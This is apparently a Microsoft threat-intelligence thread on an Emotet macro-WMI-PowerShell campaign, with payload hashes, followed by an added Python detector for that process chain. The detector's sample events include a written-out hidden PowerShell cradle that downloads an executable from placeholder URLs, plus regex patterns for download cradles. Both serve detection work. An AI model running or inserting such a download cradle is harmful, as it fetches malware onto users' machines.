Microsoft Threat Intelligence Profile picture
We are Microsoft's global network of security experts. Follow for security research and threat intelligence.

Apr 30, 2019, 5 tweets

One of the biggest spam campaigns today is Emotet distributing malicious documents that use WMI to run a PowerShell script that downloads the Emotet payload from 5 URLs. Emotet has been using this technique for a while; it might be proving effective as it’s still being actively used.

The campaign we saw today uses the typical “past due invoice” emails. The attachment is a document that says “You must have Office 365 admin permissions” to trick recipients into enabling the macro, which then runs a WMI command to launch the PowerShell download code.

Office 365 ATP detects these documents attached to emails. On endpoints, Microsoft Defender ATP detects the documents and Emotet payloads using protections that are enriched by signals from Office 365 ATP. #signalsharing #machinelearning #MicrosoftThreatProtection @MicrosoftMTP

Sample WMI-utilizing document: SHA-256 1191fec079039583684a3d194de241773836ea73222ceb66e1573f32ac4a3482, d41ded2a8bc759c2b491fba4fc9f4f08a64ee30a801b57feeb046cea71de9fd1, d982e4f96dd03cb0cb736396c3a19e8d50ca59e9dc939010918b8eb0842e0729

Sample Emotet payloads in this campaign: SHA-256 07eab50c3ad374ed28472e5d362c27415b82928d844bc8a74addfdb3c88a1543, e1cff9857674b52f80a6f28ec52f5d1787779985ad63b530189b6dff39ca9d5b, a082cd89bfa5b0fe364d10874531b053d127580f4266bb6af5c037eeb0f47b93
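Added example, not part of the thread and not Microsoft's own detection logic: a small Python detector for the process chain described above (macro -> WMI -> PowerShell download from several fallback URLs). It assumes, as a well-known Windows behaviour that the thread does not spell out, that a process created through WMI's Win32_Process.Create is parented by WmiPrvSE.exe rather than by the Office application, which is why a plain "Office spawned PowerShell" rule misses it. The event records, field names and URLs are constructed for the example.

```python
"""Flag shell processes launched through WMI that carry a download cradle.

Detection sketch for the Emotet delivery chain: Office macro -> WMI
Win32_Process.Create -> powershell.exe fetching the payload from a list of URLs.
The events below are constructed sample telemetry, not real logs.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    parent_image: str   # image path of the parent process
    image: str          # image path of the created process
    command_line: str


# Assumption (well-known behaviour, not stated in the thread): processes created
# via WMI are children of the WMI provider host, so the Office application never
# appears as the direct parent of the downloader.
WMI_HOST = "wmiprvse.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Download cradle / encoded command markers commonly seen in one-liner droppers.
DOWNLOAD_MARKERS = re.compile(
    r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b"
    r"|start-bitstransfer|-enc|-e ",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def basename(path):
    """Return the lower-cased file name from a Windows-style path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return the list of reasons an event looks like a WMI-launched download
    cradle. An empty list means nothing suspicious was observed."""
    reasons = []
    if basename(ev.image) not in SHELLS:
        return reasons
    if basename(ev.parent_image) == WMI_HOST:
        reasons.append("shell spawned by the WMI provider host")
    if DOWNLOAD_MARKERS.search(ev.command_line):
        reasons.append("download or encoded-command marker in command line")
    urls = URL_RE.findall(ev.command_line)
    if len(urls) >= 3:
        # Several URLs in one command line matches the fallback-list pattern.
        reasons.append(f"{len(urls)} URLs in one command line")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Return (pid, reasons) for events that hit at least min_reasons checks."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev.pid, reasons))
    return hits


# Constructed sample events (URLs use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    ProcessEvent(
        pid=4120,
        parent_image=r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=(
            "powershell -nop -w hidden -c \"$u='http://a.example.invalid/x/',"
            "'http://b.example.invalid/x/','http://c.example.invalid/x/',"
            "'http://d.example.invalid/x/','http://e.example.invalid/x/';"
            "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile("
            "$x,$env:TEMP+'\\s.exe');break}catch{}}\""
        ),
    ),
    # Admin interactively fetching a tool: one marker only, not flagged.
    ProcessEvent(
        pid=5208,
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="powershell.exe Invoke-WebRequest https://tools.example.invalid/t.zip -OutFile t.zip",
    ),
    # Benign WMI-launched cmd (e.g. inventory script): parent only, not flagged.
    ProcessEvent(
        pid=6011,
        parent_image=r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        image=r"C:\Windows\System32\cmd.exe",
        command_line="cmd.exe /c whoami",
    ),
]


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Requiring two independent signals (WMI parent plus a cradle marker or a URL list) keeps a lone administrator's Invoke-WebRequest and routine WMI-launched commands below the threshold while the dropper chain trips all three checks.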
